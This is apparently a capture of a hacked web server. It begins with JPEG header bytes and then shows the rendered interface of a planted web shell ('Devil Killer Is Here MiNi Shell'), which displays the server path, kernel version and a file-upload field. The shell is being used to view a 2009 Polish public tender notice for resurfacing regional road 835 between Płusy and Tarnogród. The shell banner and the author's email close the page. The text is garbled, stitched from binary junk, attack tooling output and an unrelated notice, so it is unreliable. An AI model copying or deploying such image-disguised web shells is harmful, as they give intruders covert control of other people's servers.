JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090701/102749-N-2009.html

<p class="kh_header"><b>Zamość: Remont nawierzchni drogi wojewódzkiej nr 835 Lublin - Wysokie - Biłgoraj - Sieniawa od km 104+100 do km 107+600 odcinek Płusy - Tarnogród długości 3,500 km</b><br>
<b>Numer ogłoszenia: 102749 - 2009; data zamieszczenia: 01.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Lublinie Rejon Dróg Wojewódzkich w Zamościu , ul. Peowiaków 7, 22-400 Zamość, woj. lubelskie, tel. 084 6381053, 6386639, faks 084 6386639.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont nawierzchni drogi wojewódzkiej nr 835 Lublin - Wysokie - Biłgoraj - Sieniawa od km 104+100 do km 107+600 odcinek Płusy - Tarnogród długości 3,500 km.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres robót obejmuje : a) roboty remontowe - frezowanie korekcyjne nawierzchni bitumicznej o średniej grubości 6 cm ( materiał składany na poboczu - przeznaczony do wbudowania w pobocze drogi ) b) wyrównanie ( lokalnych zaniżeń ) istniejącej podbudowy mieszanką mineralno - asfaltową z wbudowaniem mechanicznym 0-25 mm , dla KR 3-6 c) ułożenie siatek przeciwspękaniowych z włókna szklanego o wytrzymałości na rozciąganie 80KN d) odtworzenie podbudowy z mieszanki mineralno - bitumicznej 0/25 dla KR3-6 e) wykonanie warstwy wiążącej 4 cm z mieszanki mineralno - asfatowej 0/16 dla KR3-6 f) wykonanie warstwy ścieralnej 3 cm z betonu asfatowego 0/12,8 dla KR 3-6 g) mechaniczne profilowanie poboczy h) cięcie piłą nawierzchni bitumicznych na głębokość 6-10 cm z zalaniem szwu dylatacyjnego o szerokości do 2 cm masą carbitex i) utwardzenie poboczy pospółką lub destruktem z frezowania j) oczyszczenie rowów k) oczyszczenie przepustów o srednicy 0,6 m z namułu l) regulacja pionowa studzienek dla kratek ściekowych ulicznych ł) remont przepustów rurowych pod zjazdami m) oznakowanie poziome nawierzchni n) urządzenia bezpieczeństwa ruchu U-1a . Szczegółowy zakres robót ujęty jest w przedmiarze robót oraz w szczegółowej specyfikacji technicznej . 2. Wszystkie prace zostaną wykonane bez zmiany szerokości i lokalizacji nawierzchni 3. Wykonawca zobowiązany jest do zapewnienia bezpiecznych warunków ruchu drogowego , kołowego i pieszego w rejonie prowadzonych robót objętych umową na podstawie sporządzonego we własnym zakresie projektu organizacji ruchu ( na czas prowadzonych robót ) zatwierdzonego przez Zarządzającego ruchem na drogach wojewódzkich tj. Dyrektora ZDW w Lublinie 4. Okres gwarancji dla robót objętych zamówieniem wynosi 2 lata od daty odbioru ostatecznego 5. Zamawiający żąda wskazania przez wykonawcę w składane ofercie części zamówienia , której wykonanie zamierza powierzyć podwykonawcom 6. Zgodnie z art. 30 ust. 4 ustawy Prawo zamówień publicznych zamawiający dopuszcza rozwiązania równoważne opisywanym . Wykonawca , który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego jest obowiązany wykazać ,że oferowane roboty budowlane spełniają wymagania określone przz zamawiającego ( art. 30 ust. 5 ustawy ) . Wartość zamówienia podstawowego 2 540 124,11 zł netto ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.23.32.23-8, 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 85.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w kwocie  13 000,00 zł . 2. Wadium może być wnoszone w formach przewidzianych art. 45 ust. 6 ustawy Prawo zamówień publicznych 3. Wadium w formie gotówkowej należy wpłacić przelewem na konto ZDW w Lublinie w Kredyt banku S.A. O/Lublin nr 89 1500 1520 1215 2004 1596 0000 przed terminem składania ofert 4.Dokument potwierdzający wniesienie wadium należy dołączyć do oferty 5. wadium wnoszone w formie pieniężnej uważa się za wniesione w terminie jeżeli wpłynie ono na konto zamawiającego przed upływem terminu składania ofert . Uwaga : Wadium w pieniądzu należy wnosić ściśle z dyspozycją art. 45 ust. 7 ustawy Prawo zamówień publicznych , tzn. przelewem na rachunek bankowy wskazany przez zamawiającego . W myśl art. 63 ust. 3 pkt 1 ustawy Prawo bankowe z dnia 29 sierpnia 1997 r ( tekst jednolity Dz. U. z 2002 r nr 72 poz 665 ) polecenie przelewu jest jedną z form rozliczenia bezgotówkowego . Zgodnie z art. 63 Prawa bankowego polecenie przelewu stanowi udzieloną bankowi dyspozycję dłużnika obciążenia jego rachunku określoną kwotą i uznania tą kwotą rachunku wierzyciela . Oznacza to , że wpłata gotówkowa wnoszona na poczcie lub w banku nie stanowi polecenia przelewu w rozumieniu wyżej cytowanych przepisów .<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą się ubiegać wykonawcy , którzy udokumentują przez stosowne oświadczenia lub dokumenty , że spełniają następujace warunki : 1) Są uprawnieni do występowania w obrocie prawnym zgodnie z wymaganiami ustawowymi 2) Posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 3) Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia 4) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 5) Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych ( tekst jednolity Dz.U. z 2007r. nr 223 poz 1655 z późniejszymi zmianami ) 2. Ponadto wykonawca musi spełniać następujące warunki udziału : 1) Dysponowanie osobami przewidzianymi do realizacji robót budowlanych , posiadającymi uprawnienia kierownika budowy dla branży drogowej . Wskazane osoby winny posiadać aktualne zaświadczenie odpowiedniego organu samorządu zawodowego o wymaganym ubezpieczeniu od odpowiedzialności cywilnej , lub przedstawią pisemne zobowiązanie innego podmiotu do udostępnienia osób posiadających wymagane uprawnienia do wykonania zamówienia 2) Dysponowanie niezbędnymi do wykonania zamówienia narzędziami i urzadzeniami lub przedstawienie pisemnego zobowiązania innego podmiotu do udostępnienia narzędzi i urządzeń wymienionych poniżej : a) frezarka o szerokości roboczej min. 1 m - 1 szt. b) szczotka mechaniczna - 2 szt. c) skrapiarka samobieżna min. 2000 l - 1 szt.  d) układarka mas asfaltowych - 1 szt. e) walec stalowy 10 Mg z wibracja 1 szt.  f) równiarka 1 szt. g) samochody samowyładowcze 10Mg - 5 szt. h) wytwórnia mas bitumicznych 30 Mg  1 szt. / czas wbudowania masy max. 2 godziny od chwili wytworzenia / i) sygnalizacja świetlna dla robót drogowych 1 komplet / trójkolorowa zmiennoczasowa / 3) Wykonanie w ciągu ostatnich 5 lat przed wszczęciem postępowania o udzielenie zamówienia , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , minimum jednej roboty budowlanej odpowiadającej swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia , z podaniem ich wartości , daty i miejsca wykonania , oraz załączeniem dokumentów potwierdzających że roboty te zostały wykonane należycie  3. Ocena spełniania warunków , dokonywana będzie w następujący sposób : spełnia warunki lub nie spełnia warunków ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełniania warunków udziału w postępowaniu , wykonawca załączy do oferty następujace oświadczenia lub dokumenty : 1) Dokument uprawniający wykonawcę do występowania w obrocie prawnym zgodnie z wymaganiami ustawowymi - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej , jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej , wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert 2) Oświadczenie o spełnianiu warunków art. 22 ust. 1 pkt 1-4 ustawy prawo zamówień publicznych 3) Wykaz robót budowlanych wykonanych w ciągu ostatnich 5 lat przed wszczęciem postępowania , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , minimum jednej roboty budowlanej odpowiadającej rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia , z podaniem wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających że roboty te zostały wykonane należycie ( minimum jeden dokument ) 4) Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń , którymi dysponuje lub będzie dysponował wykonawca . W przypadku podania w wykazie narzędzi i urządzeń , którymi wykonawca dopiero będzie dysponował , należy przedstawić pisemne zobowiązanie innego podmiotu do udostępnienia niezbędnych narzędzi i urządzeń . 5) Wykaz osób , którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia , wraz z informacjami na temat ich kwalifikacji zawodowych , doświadczenia i wykształcenia niezbędnych do wykonania zamówienia , także zakresu wykonywanych przez nie czynności /należy załączyć kserokopie uprawnien budowlanych oraz zaświadczenie z Okręgowej Izby Inżynierów Budownictwa o ubezpieczeniu od odpowiedzialności cywilnej /. W przypadku podania w wykazie osób , którymi wykonawca dopiero będzie dysponował , należy przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia . 2. Ponadto wykonawca obowiązany jest dołączyć do oferty : 1) Dowód wniesienia wadium ( w przypadku wniesienia wadium w formie innej niż pieniądz dokument powinien byc złożony w formie oryginału ) 2) Ofertę przetargową ( z ceną brutto , netto, podatkiem VAT) 3) Kosztorys ofertowy 4) Wykaz cen czynników produkcji do kosztorysu ofertowego.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.zdw.lublin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich w Lublinie , Rejon Dróg Wojewódzkich w Zamościu , 22-400 Zamość ul. Peowiaków 7 , pokój nr 36.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2009 godzina 09:50, miejsce: Zarząd Dróg Wojewódzkich w Lublinie , Rejon Dróg Wojewódzkich w Zamościu , 22-400 Zamość ul. Peowiaków 7 , pokój nr 36.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com